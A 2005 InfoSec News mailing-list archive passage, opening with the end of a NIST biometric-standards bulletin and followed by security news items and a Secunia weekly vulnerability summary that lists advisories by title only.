between different system components or between systems. It promotes interoperability of biometric-based application programs and systems, provides forward compatibility for technology improvements, and simplifies the software and hardware integration process. The CBEFF was augmented by the NIST/BC Biometric Interoperability, Performance and Assurance Working Group to incorporate a compliant smart card format, product identification (ID), and a CBEFF nested structure definition. The augmented CBEFF was submitted to the INCITS M1 committee for processing as a national standard and has been published as American National Standard INCITS 398-2005. The international version of CBEFF is in the last stages of development and is expected to become an ISO standard at the end of 2005. NISTIR 6529A is available at: http://www.itl.nist.gov/div893/biometrics/documents/NISTIR6529A.pdf Other Organizations Supporting Biometric Technology The National Biometric Security Project (NBSP) is an independent not-for-profit corporation, which supports non-defense government and private sector efforts to protect the security of the civil infrastructure from terrorist threats through the application of proven biometric technologies. More information is available at: http://www.nationalbiometric.org/nbsp.html The Department of Defense (DoD) Biometrics Management Office (BMO) is responsible for leading, consolidating, and coordinating the development, adoption, and use of biometric technologies for the Department of Defense to support the warfighter and enhance Joint Service interoperability. More information is available at: http://www.biometrics.dod.mil/ The BioAPI Consortium was founded to develop a biometric Application Programming Interface (API) to allow for platform and device independence to application programmers and biometric service providers. The BioAPI Consortium is a group of over 120 companies and organizations that have a common interest in promoting the growth of the biometrics market. The BioAPI Consortium developed a specification and reference implementation for a standardized API that is compatible with a wide range of biometric application programs and a broad spectrum of biometric technologies. More information is available at: http://www.bioapi.org/ The Biometric Interoperability, Performance and Assurance Working Group was established by NIST and the Biometric Consortium to broaden the utilization and acceptance of biometric technologies and to facilitate and encourage further exchange of information and collaborative efforts for biometrics between users and private industry. The Working Group (WG) supports the advancement of technically efficient and compatible biometrics technology solutions on a national and international basis. The WG addresses issues and efforts other than those efforts already under way in national or international organizations, such as formal standards bodies, industrial consortiums, and cooperative testing activities. In addition to developing the Common Biometric Exchange Formats Framework (the augmented and revised version of CBEFF), the WG developed a specification defining methods for biometric template protection and a biometric Application Programming Interface for Java Card. Support for Voluntary Standards Development NIST has contributed to the development of national and international standards for biometrics. These standards are considered to be critical for U.S. needs for homeland security, the prevention of identity theft, and for other government and commercial applications based on biometric personal authentication. These standards are essential for achieving the connectivity and interoperability of different systems and for assuring security. As an accredited standards developer, NIST/ITL has sponsored the development of voluntary industry standards for the interchange of fingerprints, facial data, and scar, mark and tattoo (SMT) data. For the past seven years and particularly since September 11, 2001, NIST has intensified its work in support of the development of biometric standards by working with consortia and other industry groups. NIST strongly backs national and international standards organizations as the best environments for the development of voluntary consensus standards for biometric technology and the deployment of standards-based solutions. Priorities for homeland security have been driving efforts to develop high performance interoperability standards for biometrics. Interest in standards for smart cards has also intensified. The chief U.S. venues for these standardization efforts are the InterNational Committee for Information Technology Standards (INCITS) Technical Committees M1, for biometrics, and B10, for smart cards. In addition to developing national standards, the M1 and B10 committees act as the U.S. technical advisory groups (TAGs) to subcommittees in International Standards Organization/ International Electrotechnical Commission (ISO/IEC) Joint Technical Committee 1 (JTC 1). INCITS M1 is the TAG to ISO/IEC JTC 1 Subcommittee 37 - Biometrics. INCITS B10 is the TAG to ISO/IEC JTC 1 SC 17 - Cards & Personal Identification. NIST contributes to the work of INCITS M1 and to JTC 1 SC 37 by providing leadership, including committee officers, technical editors, and other technical expertise. The committees' work includes the development of standards and specifications for biometric data formats for finger, facial, iris, and signature recognition; the development of application profiles for transportation workers, border crossing, and point-of-sale; and biometric performance evaluation and reporting methods. Since its first meeting in January 2002, the INCITS M1 committee has developed many needed biometric data interchange and interoperability standards, which have been approved as American National Standards Institute (ANSI) standards: seven biometric data interchange standards and two biometric application profiles. Two biometric interface standards (the BioAPI specification and the Common Biometric Exchange Framework Format) were also approved by INCITS. In 2005 ISO approved and published four biometric data interchange standards that had been developed by JTC 1 SC 37. In the United States, large government organizations are adopting many of the INCITS biometric standards that have been approved as American National Standards. Large international organizations are adopting the international standards emerging from JTC 1 SC 37. Other standards that will contribute to the successful deployment of secure, interoperable, reliable, secure, and cost-effective information systems are currently under development in these national and international standards groups. Voluntary industry standards to which NIST has made significant contributions include: * X9.84-2000, Biometrics Management and Security for the Financial Services Industry. This standard specifies the minimum security requirements for effective management of biometrics data for the financial services industry and security for the collection, distribution, and processing of biometrics data. * ANSI/NIST-ITL 1-2000, Data Format for the Interchange of Fingerprint, Facial, and Scar, Mark and Tattoo (SMT) Information. This standard revises and consolidates earlier standards developed by NIST to specify a common format for exchanging biometric data across jurisdictional lines or between dissimilar systems made by different manufacturers. Originally published as NIST Special Publication 500-245, the specifications were advanced to status of national standards in accordance with ANSI procedures for the development of standards using the canvass method. Conformance Testing in Support of Users and Product Developers Standards-based, high-quality conformance testing helps both developers and users by validating conformance claims, leading to greatly increased levels of confidence in products. Testing can also help to ensure interoperability between standards-based products and systems. NIST and the Department of Defense (DoD) Biometrics Management Office (BMO) have been working in close collaboration in the development of biometric standards and supporting testing tools. For more than a year, NIST and the BMO have been independently developing implementations of BioAPI test tools. These test tools will support users within DoD and other government agencies already requiring, or intending to require in the near future, that Biometric Service Providers (BSPs) conform to the BioAPI standard. The test tools will enable the future establishment of conformity assessment programs to validate conformance to the BioAPI standard and other emerging standards, and will help product developers interested in developing products conforming to voluntary consensus biometric standards to use the same test tools available to users. NIST and the BMO are conducting intensive testing of the initial versions of the test tools to cross-validate the test results using a number of vendor BSPs that claim their products conform to the BioAPI standard. The initial test tool implementations were developed using concepts and principles specified in a draft conformance testing methodology standard that is currently under development in INCITS M1 committee. This documentary standard project was sponsored by NIST, the DoD BMO, the National Biometric Security Project (NBSP), Saflink Corp., and The Biometric Foundation (TBF). The NIST test tool implementation development was co-sponsored by the National Biometric Security Project. The principal developer is Saflink Corp. Conclusion After many years of involvement in biometric activities, NIST continues to investigate promising technologies and to advance the development of industry standards for biometrics. Although they are quite promising, biometric technologies are not the sole solution for controlling access to information or for verifying the identity of an individual. All biometric data must be protected appropriately, and biometric controls must be selected and used within an integrated security program that assesses risks to information and information systems, determines security requirements, and selects cost-effective management, operational, and technical controls. Disclaimer Any mention of commercial products or reference to commercial organizations is for information only; it does not imply recommendation or endorsement by NIST nor does it imply that the products mentioned are necessarily the best available for the purpose. Elizabeth B. Lennon Writer/Editor Information Technology Laboratory National Institute of Standards and Technology 100 Bureau Drive, Stop 8900 Gaithersburg, MD 20899-8900 Telephone (301) 975-2832 Fax (301) 975-2378 From isn at c4i.org Thu Sep 15 00:51:59 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 15 00:58:59 2005 Subject: [ISN] Web sites hosted by S. Korea's leading internet portal hacked Message-ID: http://english.yna.co.kr/Engnews/20050913/660000000020050913214344E8.html 2005/09/13 SEOUL, Sept. 13 (Yonhap) -- Unidentified computer hackers have attacked a score of Web sites hosted by Daum Communications Corp., South Korea's second most-popular Internet portal, causing a barrage of spam e-mail to their members, a computer security company said Tuesday. Multiple spam e-mails were simultaneously sent to members of some 20 community service Web sites hosted by Daum after the attacks the previous day, Geot said. The number of computer users affected by the hacking incident is estimated at several millions, as most of the Web sites that were hacked claim hundreds of thousands of members each. Daum said its computer servers were not affected and the chances are the hackers secured lists of e-mail addresses by attacking the personal computers of the Web sites' administrators. However, Geot said it cannot rule out the possibility the hackers attacked the Internet portal's computer system directly as only the Web sites with the largest number of members were attacked. Police computer forensics experts are currently investigating the circumstances behind the mass dissemination of spam e-mails, the two companies said. From isn at c4i.org Thu Sep 15 00:52:14 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 15 00:59:25 2005 Subject: [ISN] Microsoft chief of security hit by rogue dialler scam Message-ID: http://www.techworld.com/security/news/index.cfm?NewsID=4375 By Matthew Broersma Techworld 09 September 2005 Microsoft UK's recently appointed chief security advisor, Ed Gibson, has admitted to being hit by that lowliest of online scams - the rogue dialler. The scams are seen as mainly affecting the lowest rung of Internet users - beginners using dial-up connections without basic security software, such as a firewall, that would prevent infection or alert them to the dialler's activities. However, broadband users can also be affected via back-up modem connections. However, the problem clearly isn't limited to Internet newbies, Gibson reportedly said at a trade conference last week. A rogue dialler recently cost Gibson ?450 in phone bills, which BT is insisting he pay. Gibson told attendees at London "eConfidence: Spam and Scams" conference that more must be done about the rogue dialler problem. It isn't clear how Gibson, a former senior FBI officer specialising in financial crime, was infected with the dialler software. Microsoft wasn't able to immediately comment. Rogue diallers secretly install code on a user's system causing modems to connect to the Internet via a premium-rate number, whose profits are siphoned off to the scammers. Public outrage over the scams reached a high level about a year ago, and in recent weeks BT, the premium-rate regulator and the government have begun taking action to protect users, punish rogue dialler scammers more harshly, and to make it more difficult for scammers to get at premium-rate funds. ICSTIS, the regulator of premium-rate services in the UK, last month announced that telephone providers will now be forced to delay transferring funds to premium-rate number holders for 30 days. The measure is expected to make it harder for the scams to operate. Previously number operators were paid within a couple of days. In June, the government announced that rogue dialler scammers could face fines of up to ?250,000 under new government proposals backed by ICSTIS. BT, for its part, earlier this year introduced free software called Modem Protection designed to stop rogue diallers. The software alerts users whenever the computer attempts to dial a number not on the user's "safe" list. Gibson started with Microsoft in July, after 20 years in senior positions with the FBI. He has served as the FBI's assistant legal attach? in the UK for the past five years, before which he spent 15 years as an investigating agent specialising in asset tracing and confiscation, money laundering, intellectual property theft and financial crime. Over the past five years Gibson has become known in the UK for his cybercrime lectures, beginning each lecture wearing dark glasses. Gibson reports to Nick McGrath, head of platform strategy for Microsoft UK. He replaced the more technically-oriented Stuart Okin, who left Microsoft for Accenture last year. From isn at c4i.org Thu Sep 15 00:49:01 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 15 00:59:58 2005 Subject: [ISN] Can Spies Decipher Keyboard Clicks? Message-ID: http://www.pcworld.com/news/article/0,aid,122541,00.asp Robert McMillan IDG News Service September 14, 2005 Researchers at the University of California, Berkeley, have found a way to turn the clicks and clacks of typing on a computer keyboard into a startlingly accurate transcript of what exactly is being typed. In a paper released last week, the researchers explained how they developed software that could analyze the sound of someone typing on a keyboard for just ten minutes and then piece together as much as 96 percent of what had been typed. The technique works because of the simple fact that the sound of someone striking an "a" key is different from the sound of striking the "t," according to Doug Tygar, a professor of computer science at Berkeley. "Think of a conga drum. If you hit a conga drum on different parts of the skin, it makes a different tone," he said. "That's an analogy for what's happening here, because there's a plate underneath the keyboard [that is] being struck in different locations." The Tones Tell Once the different tones were identified, Tygar and his team used techniques from a field of research called statistical learning theory to map them into similar categories and arrive at some early guesses at what the text might be. They then applied a number of spelling and grammar correction tools to this text to refine those guesses. This process ultimately converts the keyboard sounds into readable text. Statistical learning, also called machine learning, provides a way for computers to make sense out of complex pieces of data. It has been a hot area for computer science research over the last ten years, forming the basis for products such as spam detectors and speech recognition systems, Tygar said. Because the Berkeley researchers' technique is based on the sound of the key and not the timing of the keystrokes, typing by both touch and hunt-and-peck typists can be decoded using this technique. The idea of snooping via keyboards has been around since the beginning of the Cold War, when Soviet spies bugged IBM Selectric typewriters in the American embassy in Moscow. Keystroke-logging devices have also been around for some time. But the Berkeley researchers are breaking new ground in using these techniques with computer keyboards, said Bruce Schneier, chief technology officer at Counterpane Internet Security and the author of Applied Cryptography. "In security, the devil is in the details, and these guys did the details," he said. Too Simple to be Safe Some details remain unsolved, however. The researchers did not use certain commonly used keys such as "shift" and "backspace" in their study, and they only looked at text that was typed in English. Still, neither Schneier nor Tygar believe that these details will prevent the techniques from ultimately working in uncontrolled environments. In fact, Schneier believes it is only a matter of time before criminals begin using similar techniques. "Somebody else will use it," he said. "And if you believe the [National Security Agency] hasn't done this already, you're naive." Tygar agrees that the techniques described in his paper are relatively easy; his team used open-source spell-checkers and a $10 PC microphone, for example. And for that reason, the Berkeley team has decided not to release the source code used in the study. "I don't think it's very hard for people to put this together, but I don't want to make it easy for people, either," Tygar says. Rock on for Security So, what should computer users make of this new security threat? Tygar says that one lesson to be drawn is that even randomly generated passwords are not secure. His researchers were able to guess 90 percent of all randomly generated five-character passwords within 20 tries using these techniques, he said. "We probably don't want to be relying on passwords as we do," he said. There is, however, one easy step that users can do take to mitigate this type of attack: Turn up the background noise. "In more noisy environments with different kinds of sounds, like music and human voices, all mixed up together, it could be pretty difficult to separate the keyboard sounds from other sounds," said Li Zhuang, one of the Berkeley computer science students who coauthored the paper. So people looking to rock out at work now have an excuse, Zhuang said. "I think playing music will make this attack much, much harder to do," she said. "Now you have a good reason to do this." The team has posted a "preprint" abstract of its paper, which will be presented in November at the Association for Computing Machinery Conference on Computer and Communications Security, in Alexandria, Virginia. From isn at c4i.org Thu Sep 15 00:49:13 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 15 01:00:31 2005 Subject: [ISN] Dilbert infosec humor Message-ID: Just in case you missed it... http://www.dilbert.com/comics/dilbert/archive/dilbert-20050912.html - WK From isn at c4i.org Fri Sep 16 05:02:24 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 16 05:08:22 2005 Subject: [ISN] Techies don't get security either Message-ID: http://www.theregister.co.uk/2005/09/15/gartner_security_risk/ By John Leyden 15th September 2005 Heads of information security functions are more likely to be business managers than techies in future as companies take a more strategic approach that balances IT security threats against business drivers. That's according to analyst house Gartner which predicts security will evolve into an element of a wider risk management strategy. It reckons the days of security people blocking projects without considering the wider picture are numbered. "Business lives by risk. But the concept of 'acceptable risk' is an oxymoron to many security professionals," said Paul Proctor, research vice president with Gartner's Information Security Group. He explained that large organisations thrive by having a developed understanding of risk, and by accepting it when it offers a business advantage. Instead of the ability to scare budgets out of chief information security officers, a future risk management officer will be well-versed in communication and project management skills and more likely to have trained in business school than as a techie. This will leave technical staff unable to rise beyond a certain position in their company unless they get a business degree. "The ability to determine what constitutes risk, and the requirement to report that risk to executive decision makers, can be a highly political activity requiring excellent written and oral communication skills with a good knowledge of business. Generally, these skills have been lacking in traditional technically-oriented information security specialists," Proctor added. "The days of security being handled by the 'network person' who did security in their spare time are over and increasingly we are seeing seasoned professionals with real business experience and business school qualifications stepping into the security space." Business people also need to adapt and realise the security cannot be achieved by technology and needs to be built into a corporate culture. This will require cultural, behavioural, procedural and technical change, according to Gartner. Proctor made his comments during a presentation at the Gartner IT Security Summit in London on Wednesday. ? From isn at c4i.org Fri Sep 16 05:02:37 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 16 05:08:45 2005 Subject: [ISN] Laptop with personal data of 98,000 recovered Message-ID: http://news.com.com/Laptop+with+personal+data+of+98%2C000+recovered/2100-1029_3-5867702.html By Reuters September 15, 2005 A stolen laptop computer holding personal information of more than 98,000 California university students and applicants has been recovered, but it's uncertain whether the information had been tapped, the University of California, Berkeley said on Thursday. The laptop, which stored names and Social Security numbers, disappeared in March from a restricted area of the university's graduate division offices, forcing the university to alert more than 98,000 students and applicants of the theft. The university said in a statement that a San Francisco man has been arrested and charged by the Alameda County district attorney with possession of stolen property after investigators discovered the laptop had been bought over the Internet by a man in South Carolina. Previous Next "UC police note that while a lab analysis could not determine whether the sensitive campus data was ever accessed, nothing in their investigation points to identity theft nor individuals involved in identity theft. It appears...that the intent was simply to steal and sell a laptop computer," the university said in its statement. Forensic tests showed files on the laptop had been erased and written over with a new operating system installation, leaving only residual data and making it virtually impossible to determine whether password-protected files had been breached, the university said. "The San Francisco man who was arrested told police it is his practice to install a new operating system or erase and wipe clean old data from a computer before posting it for sale online," the university said. Story Copyright ? 2005 Reuters Limited. From isn at c4i.org Fri Sep 16 05:03:26 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 16 05:09:00 2005 Subject: [ISN] Study: Security lacking at Test Site Message-ID: http://www.lasvegassun.com/sunbin/stories/lv-gov/2005/sep/15/519361083.html By Benjamin Grove SUN WASHINGTON BUREAU CHIEF September 15, 2005 WASHINGTON -- Security is lacking at the nation's nuclear weapons sites, including the Nevada Test Site, according to a recent report, but government officials say many improvements already have been made since the inspections that were the basis for the report. The study also backs a long-considered proposal that nuclear weapons and materials should be consolidated at fewer, better protected sites. It identifies the isolated, under-utilized Nevada Test Site, 60 miles northwest of Las Vegas, and Idaho National Laboratory as two logical choices for consolidation. The Test Site is already accepting at its high-security Device Assembly Facility some weapons-grade nuclear materials from the Technical Area 18 site at Los Alamos National Laboratory in New Mexico. The 121-page report was commissioned by the Energy Department, authored by retired U.S. Navy Adm. Richard Mies. It was made public earlier this month. Among the report's findings was that the National Nuclear Security Administration, the semi-autonomous agency affiliated with the Energy Department that runs the Test Site, is plagued by cultural problems that hamper security. The report notes that the problems include: * The lack of team approach to security. * An underappreciation of security, which is not fully embraced by everyone as integral to the weapons sites' missions. * A bias against training. * A lack of trust in the security organization. * An absence of accountability. Security at the Nevada Test Site has been faulted. Security guards in a mock attack exercise in August 2004 rated poorly. In another instance, an Energy Department audit noted that a guard brought unauthorized handguns to the Test Site during a 2003 training event. The security firm Wackenhut, which provides security for a number of nuclear plants and other facilities nationwide, has been the contracted security firm at the Test Site since 1965. The firm is being paid $44 million this year. Wackenhut's current contract expires Sept. 30, and bids are under review, including a Wackenhut bid to continue work. But it is not known when the job award will be announced, spokesman Kevin Rohrer said. NNSA officials have said the Test Site is secure and that improvements have been made since last year. The NNSA has already implemented 70 percent of the recommendations from the Mies report, NNSA Administrator Linton Brooks said. He commissioned the study in 2002. "I believe that security oversight and execution are greatly improved over where we were when I asked for this review," Brooks said in a written statement. "Admiral Mies advised NNSA about his findings as the review was under way and that has helped us get to where we are today." From isn at c4i.org Fri Sep 16 05:02:11 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 16 05:09:35 2005 Subject: [ISN] Secunia Weekly Summary - Issue: 2005-37 Message-ID: ======================================================================== The Secunia Weekly Advisory Summary 2005-09-08 - 2005-09-15 This week : 82 advisories ======================================================================== Table of Contents: 1.....................................................Word From Secunia 2....................................................This Week In Brief 3...............................This Weeks Top Ten Most Read Advisories 4.......................................Vulnerabilities Summary Listing 5.......................................Vulnerabilities Content Listing ======================================================================== 1) Word From Secunia: The Secunia staff is spending hours every day to assure you the best and most reliable source for vulnerability information. Every single vulnerability report is being validated and verified before a Secunia advisory is written. Secunia validates and verifies vulnerability reports in many different ways e.g. by downloading the software and performing comprehensive tests, by reviewing source code, or by validating the credibility of the source from which the vulnerability report was issued. As a result, Secunia's database is the most correct and complete source for recent vulnerability information available on the Internet. Secunia Online Vulnerability Database: http://secunia.com/ ======================================================================== 2) This Week in Brief: Tom Ferris has discovered a vulnerability in various Mozilla based browsers, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system. Please view the referenced Secunia advisories for additional details. Reference: http://secunia.com/SA16764 http://secunia.com/SA16766 http://secunia.com/SA16767 VIRUS ALERTS: Secunia has not issued any virus alerts during the week. ======================================================================== 3) This Weeks Top Ten Most Read Advisories: 1. [SA16764] Firefox IDN URL Domain Name Buffer Overflow 2. [SA16767] Mozilla IDN URL Domain Name Buffer Overflow 3. [SA16766] Netscape IDN URL Domain Name Buffer Overflow 4. [SA16747] Linux Kernel Multiple Vulnerabilities 5. [SA11762] Opera Browser Favicon Displaying Address Bar Spoofing Vulnerability 6. [SA16480] Microsoft DDS Library Shape Control Code Execution Vulnerability 7. [SA15601] Mozilla / Mozilla Firefox Frame Injection Vulnerability 8. [SA16560] Windows Registry Editor Utility String Concealment Weakness 9. [SA16806] Linksys WRT54G Multiple Vulnerabilities 10. [SA12758] Microsoft Word Document Parsing Buffer Overflow Vulnerabilities ======================================================================== 4) Vulnerabilities Summary Listing Windows: [SA16778] Mall23 eCommerce "idPage" SQL Injection Vulnerability [SA16824] Hosting Controller Unspecified Disclosure of Sensitive Information [SA16798] Handy Address Book Server SEARCHTEXT Cross-Site Scripting [SA16792] WhatsUp Gold "map.asp" Cross-Site Scripting Vulnerability [SA16742] COOL! Remote Control Denial of Service Vulnerability UNIX/Linux: [SA16815] Debian update for centericq [SA16814] AzDGDatingLite "l" Local File Inclusion Vulnerability [SA16797] Debian update for mozilla [SA16784] Red Hat update for firefox [SA16782] Red Hat update for mozilla [SA16780] Fedora update for firefox [SA16779] Fedora update for mozilla [SA16772] Ubuntu update for mozilla-browser/mozilla-firefox/mozilla-thunderbird [SA16743] SGI Advanced Linux Environment Multiple Updates [SA16828] Red Hat update for squid [SA16811] Debian update for turqstat [SA16810] Turquoise SuperStat Date Parser Buffer Overflow [SA16808] Apple Mac OS X update for Java [SA16807] Ubuntu update for squid [SA16804] SUSE Updates for Multiple Packages [SA16800] Gentoo update for python [SA16789] Trustix update for multiple packages [SA16783] GNU Mailutils imap4d "SEARCH" Format String Vulnerability [SA16781] pam-per-user Cached PAM "subrequest" Vulnerability [SA16771] Debian update for libapache-mod-ssl [SA16769] SUSE update for apache2 [SA16768] Debian update for squid [SA16763] UnixWare update for racoon [SA16760] Mandriva update for squid [SA16758] Red Hat update for pcre [SA16754] Debian update for apache2 [SA16753] Mandriva update for apache2 [SA16752] Textbased MSN Client (TMSNC) Format String Vulnerability [SA16751] OS/400 osp-cert Certificate Handling Vulnerabilities [SA16748] Slackware update for mod_ssl [SA16746] Fedora update for httpd [SA16787] Debian update for tdiary [SA16794] Slackware update for dhcpcd [SA16774] rdiff-backup "--restrict" Security Bypass Vulnerability [SA16747] Linux Kernel Multiple Vulnerabilities [SA16823] Debian update for common-lisp-controller [SA16822] common-lisp-controller Cache Directory Privilege Escalation [SA16821] Mandriva update for XFree86 [SA16817] LineControl Java Client Log Messages Password Disclosure [SA16816] GNU Texinfo Insecure Temporary File Creation [SA16812] Red Hat update for xorg-x11 [SA16803] Ubuntu update for xserver-xfree86/xserver-xorg [SA16799] Red Hat update for XFree86 [SA16791] Gentoo update for xorg-x11 [SA16790] X11 Pixmap Creation Integer Overflow Vulnerability [SA16777] XFree86 Pixmap Creation Integer Overflow Vulnerability [SA16755] Red Hat update for exim [SA16750] Ubuntu update for kernel [SA16749] Slackware update for kdebase [SA16745] Debian update for kdelibs [SA16825] Fedora update for util-linux [SA16795] Slackware update for util-linux [SA16785] util-linux umount "-r" Re-Mounting Security Issue [SA16765] Debian update for gcvs Other: [SA16761] Cisco CSS SSL Authentication Bypass Vulnerability [SA16806] Linksys WRT54G Multiple Vulnerabilities [SA16776] Ingate Firewall and SIParator Unspecified Cross-Site Scripting Cross Platform: [SA16820] TWiki "rev" Shell Command Injection Vulnerability [SA16767] Mozilla IDN URL Domain Name Buffer Overflow [SA16766] Netscape IDN URL Domain Name Buffer Overflow [SA16764] Firefox IDN URL Domain Name Buffer Overflow [SA16826] Noah's Classified SQL Injection and Cross-Site Scripting [SA16819] DeluxeBB SQL Injection Vulnerabilities [SA16813] ATutor Password Reminder SQL Injection Vulnerability [SA16802] Sun Java System Application Server JAR File Content Disclosure [SA16801] PHP-Nuke SQL Injection Vulnerabilities [SA16796] Subscribe Me Pro "l" Parameter Directory Traversal Vulnerability [SA16793] Python PCRE Integer Overflow Vulnerability [SA16788] Zebedee Denial of Service Vulnerability [SA16786] Snort TCP SACK Option Handling Denial of Service [SA16775] PunBB Multiple Vulnerabilities [SA16773] Qt Library zlib Vulnerabilities [SA16762] class-1 Forum Software File Extension SQL Injection Vulnerability [SA16757] Sun Java System Web Proxy Server Denial of Service Vulnerabilities [SA16756] mimicboard2 Script Insertion and Exposure of User Credentials [SA16830] IBM Lotus Domino "BaseTarget" and "Src" Cross-Site Scripting [SA16744] Sawmill Error Message Cross-Site Scripting Vulnerability ======================================================================== 5) Vulnerabilities Content Listing Windows:-- [SA16778] Mall23 eCommerce "idPage" SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2005-09-12 David Sopas Ferreira has reported a vulnerability in Mall23 eCommerce, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/16778/ -- [SA16824] Hosting Controller Unspecified Disclosure of Sensitive Information Critical: Less critical Where: From remote Impact: Exposure of sensitive information Released: 2005-09-15 A vulnerability has been reported in Hosting Controller, which can be exploited by malicious users to disclose sensitive information. Full Advisory: http://secunia.com/advisories/16824/ -- [SA16798] Handy Address Book Server SEARCHTEXT Cross-Site Scripting Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-13 fRoGGz has reported a vulnerability in Handy Address Book Server, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16798/ -- [SA16792] WhatsUp Gold "map.asp" Cross-Site Scripting Vulnerability Critical: Less critical Where: From local network Impact: Cross Site Scripting Released: 2005-09-12 Dennis Rand has discovered a vulnerability in WhatsUp Gold, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16792/ -- [SA16742] COOL! Remote Control Denial of Service Vulnerability Critical: Less critical Where: From local network Impact: DoS Released: 2005-09-12 basher13 has discovered a vulnerability in COOL! Remote Control, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16742/ UNIX/Linux:-- [SA16815] Debian update for centericq Critical: Highly critical Where: From remote Impact: System access, DoS Released: 2005-09-15 Debian has issued an update for centericq. This fixes some vulnerabilities, which potentially can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16815/ -- [SA16814] AzDGDatingLite "l" Local File Inclusion Vulnerability Critical: Highly critical Where: From remote Impact: Exposure of sensitive information, System access Released: 2005-09-15 rgod has reported a vulnerability in AzDGDatingLite, which can be exploited by malicious people to disclose sensitive information and compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16814/ -- [SA16797] Debian update for mozilla Critical: Highly critical Where: From remote Impact: Security Bypass, Cross Site Scripting, Spoofing, System access Released: 2005-09-13 Debian has issued an update for mozilla. This fixes some vulnerabilities, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting and spoofing attacks, and compromise a user's system. Full Advisory: http://secunia.com/advisories/16797/ -- [SA16784] Red Hat update for firefox Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-12 Red Hat has issued an update for firefox. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system. Full Advisory: http://secunia.com/advisories/16784/ -- [SA16782] Red Hat update for mozilla Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-12 Red hat has issued an update for mozilla. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system. Full Advisory: http://secunia.com/advisories/16782/ -- [SA16780] Fedora update for firefox Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-12 Fedora has issued an update for firefox. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system. Full Advisory: http://secunia.com/advisories/16780/ -- [SA16779] Fedora update for mozilla Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-12 Fedora has issued an update for mozilla. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system. Full Advisory: http://secunia.com/advisories/16779/ -- [SA16772] Ubuntu update for mozilla-browser/mozilla-firefox/mozilla-thunderbird Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-12 Ubuntu has issued updates for mozilla-browser, mozilla-firefox and mozilla-thunderbird. These fix a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a user's system. Full Advisory: http://secunia.com/advisories/16772/ -- [SA16743] SGI Advanced Linux Environment Multiple Updates Critical: Highly critical Where: From remote Impact: Security Bypass, Privilege escalation, DoS, System access Released: 2005-09-08 SGI has issued a patch for SGI Advanced Linux Environment, which fixes multiple vulnerabilities in various packages. Full Advisory: http://secunia.com/advisories/16743/ -- [SA16828] Red Hat update for squid Critical: Moderately critical Where: From remote Impact: Exposure of system information, Exposure of sensitive information, DoS Released: 2005-09-15 Red Hat has issued an update for squid. This fixes some vulnerabilities, which can be exploited by malicious people to gain knowledge of potentially sensitive information and potentially cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16828/ -- [SA16811] Debian update for turqstat Critical: Moderately critical Where: From remote Impact: System access Released: 2005-09-15 Debian has issued an update for turqstat. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/16811/ -- [SA16810] Turquoise SuperStat Date Parser Buffer Overflow Critical: Moderately critical Where: From remote Impact: System access Released: 2005-09-15 A vulnerability has been reported in Turquoise SuperStat, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/16810/ -- [SA16808] Apple Mac OS X update for Java Critical: Moderately critical Where: From remote Impact: Hijacking, Security Bypass, Manipulation of data, Privilege escalation Released: 2005-09-14 Some vulnerabilities have been reported in Java for Mac OS X, which can be exploited by malicious, local users to manipulate certain data, disclose sensitive information and gain escalated privileges, and by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16808/ -- [SA16807] Ubuntu update for squid Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-13 Ubuntu has issued an update for squid. This fixes two vulnerabilities, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16807/ -- [SA16804] SUSE Updates for Multiple Packages Critical: Moderately critical Where: From remote Impact: Unknown, Exposure of sensitive information, DoS, System access Released: 2005-09-13 SUSE has issued updates for multiple packages. These fix various vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service), gain knowledge of sensitive information and potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16804/ -- [SA16800] Gentoo update for python Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-09-13 Gentoo has issued an update for python. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16800/ -- [SA16789] Trustix update for multiple packages Critical: Moderately critical Where: From remote Impact: Security Bypass, Privilege escalation, DoS Released: 2005-09-12 Trustix has issued updates for multiple packages. These fix some vulnerabilities, which can be exploited malicious users to gain escalated privileges or bypass certain security restrictions and by malicious people to cause a DoS (Denial of Service) or potentially bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16789/ -- 